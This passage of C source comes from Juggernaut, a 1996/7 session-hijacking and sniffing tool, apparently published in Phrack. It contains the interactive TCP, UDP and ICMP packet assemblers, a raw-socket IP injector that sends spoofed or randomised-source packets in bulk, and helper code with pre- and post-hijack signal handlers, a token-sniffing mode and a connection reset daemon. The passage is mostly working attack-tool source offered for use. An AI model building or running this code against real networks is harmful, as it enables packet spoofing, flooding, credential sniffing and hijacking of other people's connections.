| fprintf(stderr,"\nFilename [q] >"); |
| if(buf[0]==0x0a||buf[0]=='q')break; |
| fgets(filename,sizeof(filename),stdin); |
| for(i=0;i<4*MINIBUF;i++)if(!filename[i])break; |
| filename[--i]=0; /* Pesky Newline */ |
| if((fd=open(filename,O_RDONLY))<0){ |
| if(verbosity){ |
| fprintf(stderr,"Cannot open file for reading.\n"); |
| fprintf(stderr,"[cr]"); |
| getchar(); |
| } |
| continue; |
| } |
| i=0; |
| j=0; |
| while(i<512){ |
| j=read(fd,tpack.payload,sizeof(tpack.payload)); |
| if(!j)break; /* No more bytes ta read */ |
| i+=j; |
| } |
| strncpy(data,filename,sizeof(filename)); |
| close(fd); |
| packetready|=0x40; |
| break; |
| } |
| if(packetready&0x40)packetready^=0x40; |
| bzero(data,sizeof(data)); |
| bzero(tpack.payload,sizeof(tpack.payload)); |
| break; |
| case 8: /* Return to previous menu */ |
| loopsentry=0; |
| bzero(&tpack,sizeof(tpack)); |
| break; |
| case 9: /* Return to Main */ |
| loopsentry=0; |
| woe=1; |
| break; |
| case 10: /* RIP assembler */ |
| if(packetready==0x07f){ /* AND mask of all the options */ |
| tpack.tcp.doff=5; /* Data offset */ |
| ripa(TCPTRANSPORT); /* Checksum will be computed in |
| ripa */ |
| break; |
| } |
| continue; |
| default: /* Bad input */ |
| continue; |
| } |
| } |
| } |
|
|
| /* |
| * UDP assembler |
| */ |
|
|
| void udpa(){ |
|
|
| void ripa(int); |
| void mwipe(); |
| void mpktaudp(int,unsigned short,unsigned short,char *); |
|
|
| char buf[2*MINIBUF]; |
| unsigned long val; |
| int packetready=0; /* flag bits */ |
| char data[4*MINIBUF]={0},filename[4*MINIBUF]={0}; |
| int i=0,j,fd=0,loopsentry=1; |
|
|
| bzero(&upack,sizeof(upack)); |
|
|
| srandom((unsigned)time(0)); |
|
|
| while(loopsentry){ |
| mwipe(); |
|
|
| mpktaudp(packetready,ntohs(upack.udp.source),ntohs(upack.udp.dest),data); |
| |
| fgets(buf,sizeof(buf),stdin); |
| if(!(val=atoi(buf)))continue; |
| switch(val){ |
| case 1: /* Source Port */ |
| fprintf(stderr,"\nSource Port (0 - 65535) [qr] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]==0x0a||buf[0]=='q'){ |
| if(packetready&0x01)packetready^=0x01; |
| upack.udp.source=0; |
| break; |
| } |
| if(buf[0]=='r'){ |
| upack.udp.source=htons(random()&0xffff); |
| packetready|=0x01; |
| break; |
| } |
| if(!(int)(val=atoi(buf)))break; |
| upack.udp.source=htons(val); |
| packetready|=0x01; |
| break; |
| case 2: /* Destination Port */ |
| fprintf(stderr,"\nDestination Port (0 - 65535) [qr] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]==0x0a||buf[0]=='q'){ |
| if(packetready&0x02)packetready^=0x02; |
| upack.udp.dest=0; |
| break; |
| } |
| if(buf[0]=='r'){ |
| upack.udp.dest=htons(random()&0xffff); |
| packetready|=0x02; |
| break; |
| } |
| if(!(int)(val=atoi(buf)))break; |
| upack.udp.dest=htons(val); |
| packetready|=0x02; |
| break; |
| case 3: /* Data payload */ |
| bzero(data,sizeof(data)); |
| bzero(upack.payload,sizeof(upack.payload)); |
| bzero(filename,sizeof(filename)); |
| fprintf(stderr,"\nData Payload Source (512 Bytes Maximum) [qfc] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='c'){ /* Input from command line */ |
| fprintf(stderr,"\nEnter Payload [q] >"); |
| fgets(upack.payload,sizeof(upack.payload),stdin); |
| strncpy(data,upack.payload,sizeof(data)); |
| packetready|=0x04; |
| break; |
| } |
| if(buf[0]=='f'){ /* Input from file */ |
| fprintf(stderr,"\nFilename [q] >"); |
| if(buf[0]==0x0a||buf[0]=='q')break; |
| fgets(filename,sizeof(filename),stdin); |
| for(i=0;i<4*MINIBUF;i++)if(!filename[i])break; |
| filename[--i]=0; |
| if((fd=open(filename,O_RDONLY))<0){ |
| if(verbosity){ |
| fprintf(stderr,"Cannot open file for reading.\n"); |
| fprintf(stderr,"[cr]"); |
| getchar(); |
| } |
| continue; |
| } |
| i=0; |
| j=0; |
| while(i<512){ |
| j=read(fd,upack.payload,sizeof(upack.payload)); |
| if(!j)break; |
| i+=j; |
| } |
| strncpy(data,filename,sizeof(filename)); |
| close(fd); |
| packetready|=0x04; |
| break; |
| } |
| if(packetready&0x04)packetready^=0x04; |
| bzero(data,sizeof(data)); |
| bzero(upack.payload,sizeof(upack.payload)); |
| break; |
| case 4: /* Return to previous menu */ |
| loopsentry=0; |
| bzero(&upack,sizeof(upack)); |
| break; |
| case 5: /* Retuen to Main */ |
| loopsentry=0; |
| woe=1; |
| break; |
| case 6: /* RIP assembler */ |
| if(packetready==0x07){ |
| upack.udp.len=htons(UDPHDR+BUFSIZE); |
| ripa(UDPTRANSPORT); |
| break; |
| } |
| continue; |
| default: /* bad input */ |
| continue; |
| } |
| } |
| } |
|
|
| /* |
| * ICMP assembler |
| * This is no where as robust as it should be. In fact, it doesn't really |
| * create legal ICMP packets. Oh well. Next version. I am tired of |
| * packet assembly duldrums... |
| */ |
|
|
| void icmpa(){ |
|
|
| void ripa(int); |
| void mwipe(); |
| void mpktaicmp(int,unsigned short,unsigned short,char *); |
|
|
| char buf[2*MINIBUF]; |
| unsigned long val; |
| int packetready=0; /* flag bits */ |
| char data[4*MINIBUF]={0},filename[4*MINIBUF]={0}; |
| int i=0,j,fd=0,loopsentry=1; |
|
|
| bzero(&ipack,sizeof(ipack)); |
|
|
| while(loopsentry){ |
| mwipe(); |
|
|
| mpktaicmp(packetready,ipack.icmp.type,ipack.icmp.code,data); |
| |
| fgets(buf,sizeof(buf),stdin); |
| if(!(val=atoi(buf)))continue; |
| switch(val){ |
| case 1: /* Type */ |
| fprintf(stderr,"\nType (0,3,4,5,8,9,10,11,12,13,14,15,16,17,18) [q] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]==0x0a||buf[0]=='q'){ |
| if(packetready&0x01)packetready^=0x01; |
| ipack.icmp.type=0; |
| break; |
| } |
| if(!(int)(val=atoi(buf)))break; |
| ipack.icmp.type=val; |
| packetready|=0x01; |
| break; |
| case 2: /* Code */ |
| fprintf(stderr,"\nCode (0,1 {2,3}) [q] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]==0x0a||buf[0]=='q'){ |
| if(packetready&0x02)packetready^=0x02; |
| ipack.icmp.code=0; |
| break; |
| } |
| if(!(int)(val=atoi(buf)))break; |
| ipack.icmp.code=val; |
| packetready|=0x02; |
| break; |
| case 3: /* Data payload */ |
| bzero(data,sizeof(data)); |
| bzero(ipack.payload,sizeof(ipack.payload)); |
| bzero(filename,sizeof(filename)); |
| fprintf(stderr,"\nData Payload Source (512 Bytes Maximum) [qfc] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='c'){ /* Input from command line */ |
| fprintf(stderr,"\nEnter Payload [q] >"); |
| fgets(ipack.payload,sizeof(ipack.payload),stdin); |
| strncpy(data,ipack.payload,sizeof(data)); |
| packetready|=0x04; |
| break; |
| } |
| if(buf[0]=='f'){ /* Input from file */ |
| fprintf(stderr,"\nFilename [q] >"); |
| if(buf[0]==0x0a||buf[0]=='q')break; |
| fgets(filename,sizeof(filename),stdin); |
| for(i=0;i<4*MINIBUF;i++)if(!filename[i])break; |
| filename[--i]=0; |
| if((fd=open(filename,O_RDONLY))<0){ |
| if(verbosity){ |
| fprintf(stderr,"Cannot open file for reading.\n"); |
| fprintf(stderr,"[cr]"); |
| getchar(); |
| } |
| continue; |
| } |
| i=0; |
| j=0; |
| while(i<512){ |
| j=read(fd,upack.payload,sizeof(upack.payload)); |
| if(!j)break; |
| i+=j; |
| } |
| strncpy(data,filename,sizeof(filename)); |
| close(fd); |
| packetready|=0x04; |
| break; |
| } |
| if(packetready&0x04)packetready^=0x04; |
| bzero(data,sizeof(data)); |
| bzero(ipack.payload,sizeof(ipack.payload)); |
| break; |
| case 4: |
| loopsentry=0; |
| bzero(&ipack,sizeof(ipack)); |
| break; |
| case 5: |
| loopsentry=0; |
| woe=1; |
| break; |
| case 6: |
| if(packetready==0x07){ |
| ripa(ICMPTRANSPORT); |
| break; |
| } |
| continue; |
| default: |
| continue; |
| } |
| } |
| } |
|
|
|
|
| /* |
| * IP assembler and xmitter. Transport layer checksum routines thanks to |
| * Myth (Red, actually). |
| */ |
|
|
| void ripa(transport) |
| int transport; |
| { |
|
|
| void mwipe(); |
| void mpktaip(int,char *,char *,unsigned short,unsigned short,char *,char *,int,char *); |
| char *hostLookup(unsigned long); |
| unsigned long nameResolve(char *); |
| unsigned short in_cksum(unsigned short *,int); |
| |
|
|
| char buf[2*MINIBUF]; |
| unsigned long val; |
| char tosflags[MINIBUF]={0},fflags[MINIBUF]={0},packettype[MINIBUF]={0}; |
| char sip[2*MINIBUF]={0},dip[2*MINIBUF]={0},*tempBuf; |
| int packetready=0; /* flag bits */ |
| int i=0,j=0,k=0; /* Counters */ |
| int loopsentry=1,number=0; |
|
|
| struct sockaddr_in sin; |
|
|
| struct psuedoHeader{ |
| unsigned long saddr; |
| unsigned long daddr; |
| unsigned char null; |
| unsigned char prot; |
| unsigned short tlen; |
| }*ppheader; |
|
|
| extern int ripsock; |
|
|
| bzero(&rippack,sizeof(rippack)); |
| bzero((char *)&sin,sizeof(sin)); |
| |
| srandom((unsigned)time(0)); |
|
|
| while(loopsentry){ |
| i=0; |
| mwipe(); |
| mpktaip(packetready,tosflags,fflags,ntohs(rippack.ip.frag_off),rippack.ip.ttl,sip,dip,number,packettype); |
| |
| fgets(buf,sizeof(buf),stdin); |
| if(!(val=atoi(buf)))continue; |
| switch(val){ |
| case 1: /* TOS */ |
| bzero(tosflags,sizeof(tosflags)); |
| fprintf(stderr,"\nMinimize Delay? [yNq] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='q'){ |
| if(packetready&0x01)packetready^=0x01; |
| rippack.ip.tos=0; |
| break; |
| } |
| if(buf[0]=='y'){ |
| rippack.ip.tos|=0x10; |
| tosflags[i++]='D'; |
| } |
| fprintf(stderr,"\nMaximize Throughput? [yNq] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='q'){ |
| if(packetready&0x01)packetready^=0x01; |
| rippack.ip.tos=0; |
| break; |
| } |
| if(buf[0]=='y'){ |
| rippack.ip.tos|=0x08; |
| tosflags[i++]='T'; |
| } |
| fprintf(stderr,"\nMaximize Reliability? [yNq] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='q'){ |
| if(packetready&0x01)packetready^=0x01; |
| rippack.ip.tos=0; |
| break; |
| } |
| if(buf[0]=='y'){ |
| rippack.ip.tos|=0x04; |
| tosflags[i++]='R'; |
| } |
| fprintf(stderr,"\nMinimize Monetary Cost? [yNq] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='q'){ |
| if(packetready&0x01)packetready^=0x01; |
| rippack.ip.tos=0; |
| break; |
| } |
| if(buf[0]=='y'){ |
| rippack.ip.tos|=0x02; |
| tosflags[i++]='C'; |
| } |
| if(!tosflags[0])strcpy(tosflags,"none set"); |
| packetready|=0x01; |
| break; |
| case 2: /* Frag Flags */ |
| bzero(fflags,sizeof(fflags)); |
| fprintf(stderr,"\nMore Fragments? [yNq] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='q'){ |
| if(packetready&0x02)packetready^=0x02; |
| rippack.ip.frag_off=0; |
| break; |
| } |
| if(buf[0]=='y'){ |
| rippack.ip.frag_off|=htons(0x4000); |
| fflags[i++]='M'; |
| } |
| fprintf(stderr,"\nDon't Fragment? [yNq] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='q'){ |
| if(packetready&0x02)packetready^=0x02; |
| rippack.ip.frag_off=0; |
| break; |
| } |
| if(buf[0]=='y'){ |
| rippack.ip.frag_off|=htons(0x2000); |
| fflags[i++]='D'; |
| } |
| if(!fflags[0])strcpy(fflags,"none set"); |
| packetready|=0x02; |
| break; |
| case 3: /* Frag Offset */ |
| fprintf(stderr,"\nFragment Offset [qr] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='r'){ |
| rippack.ip.frag_off|=htons(random()&0x1fff); |
| packetready|=0x04; |
| break; |
| } |
| if(buf[0]=='q'||(val=atoi(buf))<0||val>8191){ |
| if(packetready&0x04)packetready^=0x04; |
| rippack.ip.frag_off&=~0x3fff; |
| break; |
| } |
| rippack.ip.frag_off|=htons(val&0x1fff); |
| packetready|=0x04; |
| break; |
| case 4: /* TTL */ |
| fprintf(stderr,"\nTTL (0 - 255) [qr] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='r'){ |
| rippack.ip.ttl=random()&0xff; |
| packetready|=0x08; |
| break; |
| } |
| if(buf[0]=='q'||(val=atoi(buf))<0||val>255){ |
| if(packetready&0x08)packetready^=0x08; |
| rippack.ip.ttl=0; |
| break; |
| } |
| rippack.ip.ttl=val; |
| packetready|=0x08; |
| break; |
| case 5: /* Source Address */ |
| bzero(sip,sizeof(sip)); |
| fprintf(stderr,"\nSource Address [qr] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]==0x0a||buf[0]=='q'){ |
| if(packetready&0x10)packetready^=0x10; |
| rippack.ip.saddr=0; |
| break; |
| } |
| if(buf[0]=='r'){ |
| rippack.ip.saddr=htonl(random()); |
| strncpy(sip,hostLookup(rippack.ip.saddr),sizeof(sip)); |
| packetready|=0x10; |
| break; |
| } |
| strncpy(sip,buf,sizeof(sip)); |
| for(i=0;i<2*MINIBUF;i++)if(!sip[i])break; |
| sip[--i]=0; |
| if(!(rippack.ip.saddr=nameResolve(buf))){ |
| fprintf(stderr,"Cannot resolve IP address.\n"); |
| fprintf(stderr,"[cr]"); |
| getchar(); |
| bzero(sip,sizeof(sip)); |
| if(packetready&0x10)packetready^=0x10; |
| break; |
| } |
| packetready|=0x10; |
| break; |
| case 6: /* Destination Address */ |
| bzero(dip,sizeof(dip)); |
| fprintf(stderr,"\nDestination Address [qr] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]==0x0a||buf[0]=='q'){ |
| if(packetready&0x20)packetready^=0x20; |
| rippack.ip.daddr=0; |
| break; |
| } |
| if(buf[0]=='r'){ |
| strncpy(dip,hostLookup(rippack.ip.daddr),sizeof(dip)); |
| rippack.ip.daddr=htonl(random()); |
| packetready|=0x20; |
| break; |
| } |
| strncpy(dip,buf,sizeof(dip)); |
| for(i=0;i<2*MINIBUF;i++)if(!dip[i])break; |
| dip[--i]=0; |
| if(!(rippack.ip.daddr=nameResolve(buf))){ |
| fprintf(stderr,"Cannot resolve IP address.\n"); |
| fprintf(stderr,"[cr]"); |
| getchar(); |
| bzero(dip,sizeof(dip)); |
| if(packetready&0x20)packetready^=0x20; |
| break; |
| } |
| packetready|=0x20; |
| break; |
| case 7: /* Number of packets to send */ |
| fprintf(stderr,"\nAmount (1 - 65536) [qr] >"); |
| fgets(buf,sizeof(buf),stdin); |
| if(buf[0]=='r'){ |
| number=(random()&0xffff); |
| packetready|=0x40; |
| break; |
| } |
| if(buf[0]=='q'||(val=atoi(buf))<0||val>65536){ |
| if(packetready&0x40)packetready^=0x40; |
| number=0; |
| break; |
| } |
| number=val; |
| packetready|=0x40; |
| break; |
| case 8: /* Return */ |
| loopsentry=0; |
| bzero(&rippack,sizeof(rippack)); |
| break; |
| case 9: |
| loopsentry=0; |
| woe=1; |
| break; |
| case 10: |
| if(packetready==0x7f){ |
| sin.sin_family=AF_INET; |
| sin.sin_port=0; |
|
|
| rippack.ip.version=4; /* IPv4 */ |
| rippack.ip.ihl=5; /* This will change |
| if options are |
| present */ |
| switch(transport){ |
| case NOTRANSPORT: /* IP packet only */ |
| sin.sin_addr.s_addr=rippack.ip.daddr; |
|
|
| rippack.ip.protocol=IPPROTO_IP; |
|
|
| break; |
| case TCPTRANSPORT: /* TCP */ |
| sin.sin_port=tpack.tcp.source; |
| sin.sin_addr.s_addr=rippack.ip.daddr; |
| |
| rippack.ip.protocol=IPPROTO_TCP; |
|
|
| tempBuf=(char *)malloc(PHDR+TCPHDR+BUFSIZE); |
| ppheader=(struct psuedoHeader *)tempBuf; |
|
|
| ppheader->saddr=rippack.ip.saddr; |
| ppheader->daddr=rippack.ip.daddr; |
| ppheader->prot=IPPROTO_TCP; |
| ppheader->null=0; |
| ppheader->tlen=htons(TCPHDR+BUFSIZE); |
|
|
| bcopy(&tpack,tempBuf+PHDR,PHDR+TCPHDR+BUFSIZE); |
| tpack.tcp.check=in_cksum((unsigned short *)tempBuf,PHDR+TCPHDR+BUFSIZE); |
| free(tempBuf); |
| bcopy((char *)&tpack,(char *)&rippack.payload,TCPHDR+BUFSIZE); |
|
|
| break; |
| case UDPTRANSPORT: /* UDP */ |
| sin.sin_port=upack.udp.source; |
| sin.sin_addr.s_addr=rippack.ip.daddr; |
|
|
| rippack.ip.protocol=IPPROTO_UDP; |
|
|
| tempBuf=(char *)malloc(PHDR+UDPHDR+BUFSIZE); |
| ppheader=(struct psuedoHeader *)tempBuf; |
|
|
| ppheader->saddr=rippack.ip.saddr; |
| ppheader->daddr=rippack.ip.daddr; |
| ppheader->prot=IPPROTO_UDP; |
| ppheader->null=0; |
| ppheader->tlen=htons(UDPHDR+BUFSIZE); |
|
|
| bcopy(&upack,tempBuf+PHDR,PHDR+UDPHDR+BUFSIZE); |
| upack.udp.check=in_cksum((unsigned short *)tempBuf,PHDR+UDPHDR+BUFSIZE); |
| free(tempBuf); |
| bcopy((char *)&upack,(char *)&rippack.payload,UDPHDR+BUFSIZE); |
|
|
| break; |
| case ICMPTRANSPORT: /* ICMP */ |
| sin.sin_addr.s_addr=rippack.ip.daddr; |
|
|
| rippack.ip.protocol=IPPROTO_ICMP; |
| |
| break; |
| default: /* Control should never fall here */ |
| if(verbosity)perror("RIP Assembler [unknown transport]"); |
| exit(1); |
| } |
| for(k=number,i=0;i<number;i++){ |
| if((j=sendto(ripsock,&rippack,RIPPACKETSIZE,0,(struct sockaddr *)&sin,sizeof(sin)))<RIPPACKETSIZE){ |
| fprintf(stderr,"Packet # %d: Wrote only %d bytes to raw socket\n",i,j); |
| k--; |
| if(verbosity)perror("RIP module sendto"); |
| } |
| } |
| fprintf(stderr,"%d Packet(s) injected.\n",k); |
| getchar(); |
| break; |
| } |
| continue; |
| default: |
| continue; |
| } |
| } |
| /* NOTREACHED */ |
| } |
| <--> |
| <++> Juggernaut/NumberOneCrush/surplus.c |
| /* |
| * |
| * Juggernaut |
| * Version b2 |
| * |
| * 1996/7 Guild productions |
| * daemon9[guild|phrack|r00t] |
| * |
| * comments to route@infonexus.com |
| * |
| * This coding project made possible by a grant from the Guild corporation |
| * |
| * surplus.c - helper functions |
| * |
| */ |
|
|
| #include <string.h> |
| #include <signal.h> |
| #include <stdio.h> |
| #include <fcntl.h> |
| #include <unistd.h> |
| #include <netdb.h> |
| #include <arpa/inet.h> |
| #include <sys/stat.h> |
| #include <sys/ioctl.h> |
| #include <sys/types.h> |
| #include <sys/wait.h> |
|
|
| #define HELPFILE "./ClothLikeGauze/.help" |
| #define FBUFSIZE 80 |
| #define MINIBUF 10 |
|
|
| extern int verbosity; |
|
|
|
|
| /* |
| * IP address into network byte order |
| */ |
| |
| unsigned long nameResolve(hostname) |
| char *hostname; |
| { |
| |
| struct in_addr addr; |
| struct hostent *hostEnt; |
| |
| if((addr.s_addr=inet_addr(hostname))==-1){ |
| if(!(hostEnt=gethostbyname(hostname)))return(0); |
| bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length); |
| } |
| return addr.s_addr; |
| } |
|
|
| #ifdef FASTCHECK |
| |
| /* |
| * Fast IP checksum routine. |
| */ |
|
|
| unsigned short in_cksum(buff,len) |
| unsigned char *buff; |
| int len; |
| { |
| unsigned long sum = 0; |
| if (len>3){ |
| __asm__("clc\n" |
| "1:\t" |
| "lodsl\n\t" |
| "adcl %%eax, %%ebx\n\t" |
| "loop 1b\n\t" |
| "adcl $0, %%ebx\n\t" |
| "movl %%ebx, %%eax\n\t" |
| "shrl $16, %%eax\n\t" |
| "addw %%ax, %%bx\n\t" |
| "adcw $0, %%bx" |
| : "=b" (sum) , "=S" (buff) |
| : "0" (sum), "c" (len >> 2) ,"1" (buff) |
| : "ax", "cx", "si", "bx" ); |
| } |
| if(len&2){ |
| __asm__("lodsw\n\t" |
| "addw %%ax, %%bx\n\t" |
| "adcw $0, %%bx" |
| : "=b" (sum), "=S" (buff) |
| : "0" (sum), "1" (buff) |
| : "bx", "ax", "si"); |
| } |
| if(len&1){ |
| __asm__("lodsb\n\t" |
| "movb $0, %%ah\n\t" |
| "addw %%ax, %%bx\n\t" |
| "adcw $0, %%bx" |
| : "=b" (sum), "=S" (buff) |
| : "0" (sum), "1" (buff) |
| : "bx", "ax", "si"); |
| } |
| sum =~sum; |
| return(sum&0xffff); |
| } |
|
|
| #else |
| |
| /* |
| * IP Family checksum routine |
| */ |
|
|
| unsigned short in_cksum(ptr,nbytes) |
| unsigned short *ptr; |
| int nbytes; |
| { |
| |
| register long sum=0; /* assumes long == 32 bits */ |
| u_short oddbyte; |
| register u_short answer; /* assumes u_short == 16 bits */ |
| |
| while(nbytes>1){ |
| sum+=*ptr++; |
| nbytes-=2; |
| } |
| if(nbytes==1){ /* mop up an odd byte, if necessary */ |
| oddbyte=0; /* make sure top half is zero */ |
| *((u_char *)&oddbyte)=*(u_char *)ptr; /* one byte only */ |
| sum+=oddbyte; |
| } |
| sum+=(sum>>16); /* add carry */ |
| answer=~sum; /* ones-complement, then truncate to 16 bits */ |
| return(answer); |
| } |
|
|
| #endif |
|
|
| /* |
| * Network byte order into IP address |
| */ |
|
|
| char *hostLookup(in) |
| unsigned long in; |
| { |
|
|
| #define BUFSIZE 256 |
| |
| char hostname[BUFSIZE]={0}; |
| struct in_addr addr; |
| #ifdef USENAME |
| struct hostent *hostEnt; |
| #endif |
| |
| addr.s_addr=in; |
| |
| #ifdef USENAME |
| hostEnt=gethostbyaddr((char *)&addr,sizeof(struct in_addr),AF_INET); |
| if(!hostEnt) |
| #endif |
|
|
| strcpy(hostname,inet_ntoa(addr)); /* KLUDGEY. */ |
|
|
| #ifdef USENAME |
| else strcpy(hostname,hostEnt->h_name); |
| #endif |
| return(strdup(hostname)); |
| } |
| |
| /* |
| * Simple daemonizing procedure. |
| */ |
|
|
| int shadow(void){ |
|
|
| int fd,pid; |
| extern int errno; |
|
|
| signal(SIGTTOU,SIG_IGN); /* Ignore these signals */ |
| signal(SIGTTIN,SIG_IGN); |
| signal(SIGTSTP,SIG_IGN); |
|
|
| switch((pid=fork())){ |
| case 0: /* Child */ |
| break; |
| default: |
| exit(0); /* Parent */ |
| case -1: |
| fprintf(stderr,"Forking Error\n"); |
| exit(1); |
| } |
| setpgrp(); |
| if((fd=open("/dev/tty",O_RDWR))>=0){ |
| ioctl(fd,TIOCNOTTY,(char *)NULL); |
| close(fd); |
| } |
| errno=0; |
| chdir("/"); |
| umask(0); |
| return(pid); |
| } |
|
|
|
|
| /* |
| * Keeps processes from zombiing on us... |
| */ |
| |
| static void reaper(signo) |
| int signo; |
| { |
| pid_t pid; |
| int sys; |
|
|
| pid=wait(&sys); |
| signal(SIGCHLD,reaper); |
| return; |
| } |
|
|
|
|
| /* |
| * Dump usage and exit. |
| */ |
|
|
| void usage(nomenclature) |
| char *nomenclature; |
| { |
| fprintf(stderr,"\n\nUsage:\t%s [-h] [-s TOKEN [-e xx] ] [-v] [-t xx]\n\n |
| -h terse help |
| -H expanded help for those 'specially challanged' people... |
| -s dedicated sniffing (bloodhound) mode, in which TOKEN is found enticing |
| -e enticement factor (defaults to 16) |
| -v decrease verbosity (don't do this) |
| -V version information |
| -t xx network read timeout in seconds (defaults to 10) |
| Invoked without arguments, Juggernaut starts in `normal` mode.\n\n",nomenclature); |
| exit(0); |
| } |
|
|
|
|
| /* |
| * Simple file pager. |
| */ |
|
|
| void bookworm(){ |
|
|
| FILE *fp; |
| char tempBuf[FBUFSIZE],buf[MINIBUF]; |
| int i=0; |
|
|
| if(!(fp=fopen(HELPFILE,"r"))){ |
| if(verbosity){ |
| fprintf(stderr,"Cannot open help file.\n"); |
| fprintf(stderr,"[cr]"); |
| getchar(); |
| return; |
| } |
| } |
| while(fgets(tempBuf,FBUFSIZE-1,fp)){ |
| fprintf(stderr,tempBuf); |
| if(i==24){ |
| fprintf(stderr,"\n[cr,q] >"); |
| bzero(&buf,sizeof(buf)); |
| fgets(buf,sizeof(buf-1),stdin); |
| if(buf[0]=='q')break; |
| i=0; |
| } |
| else i++; |
| } |
| } |
|
|
|
|
| /* |
| * Main signal handler to facilitate clean exits. |
| */ |
|
|
| void twitch(){ |
|
|
| void cleanexit(); |
|
|
| if(verbosity)fprintf(stderr,"\nCaught signal, exiting cleanly.\n"); |
| signal(SIGINT,SIG_DFL); |
| signal(SIGQUIT,SIG_DFL); |
| cleanexit(); |
| } |
|
|
|
|
| /* |
| * Used as a catchall to cleanly exit proccesses |
| */ |
|
|
| void spasm(){ |
|
|
| extern int linksock; |
|
|
| if(linksock)close(linksock); /* Hunter should have this... */ |
| exit(0); |
| } |
|
|
|
|
| /* |
| * Spy signal handler. |
| */ |
| |
| void convulsion(){ |
|
|
| void twitch(); |
| |
| extern int sigsentry; |
|
|
| if(verbosity)fprintf(stderr,"\nCaught signal.\n"); |
| fprintf(stderr,"[cr]"); |
| getchar(); |
| signal(SIGINT,twitch); |
| sigsentry=0; |
| } |
|
|
|
|
| /* |
| * Pre-hijacking signal handler. |
| */ |
|
|
| void sputter(){ |
|
|
| void twitch(); |
|
|
| extern int sigsentry; |
|
|
| if(verbosity)fprintf(stderr,"\nCaught prehijack signal.\n"); |
| signal(SIGINT,twitch); |
| sigsentry=0; |
| } |
|
|
|
|
| /* |
| * Post-hijacking signal handler. |
| */ |
|
|
| void seizure(){ |
|
|
| void twitch(); |
|
|
| extern int sigsentry; |
|
|
| if(verbosity)fprintf(stderr,"\nCaught posthijack signal.\n"); |
| sigsentry=0; |
| signal(SIGINT,twitch); |
| } |
|
|
| /* |
| * Exit Cleanly. |
| */ |
|
|
| void cleanexit(){ |
|
|
| void powerdown(); |
|
|
| extern int ripsock; |
| extern int hpid; |
| extern int acrstpid; |
|
|
| close(ripsock); |
| powerdown(); |
| if(kill(hpid,SIGUSR1))if(verbosity){ /* Send signal to the hunter */ |
| perror("(cleanexit) Could not signal hunter"); |
| fprintf(stderr,"[cr]"); |
| getchar(); |
| } |
| if(acrstpid) /* Send signal to the automated connection reset daemon. |
| XXX - This only signals one daemon! If more exist, |
| they will be left stranded! */ |
| if(kill(acrstpid,SIGUSR1))if(verbosity){ |
| perror("(cleanexit) Could not signal ACRSTD"); |
| fprintf(stderr,"[cr]"); |
| getchar(); |
| } |
| fprintf(stderr,"Juggernaut is a Guild Corporation production, (c) 1996/7.\n\n"); |
| exit(0); |
| } |
| |
| <--> |
|
|
| EOF |
|
|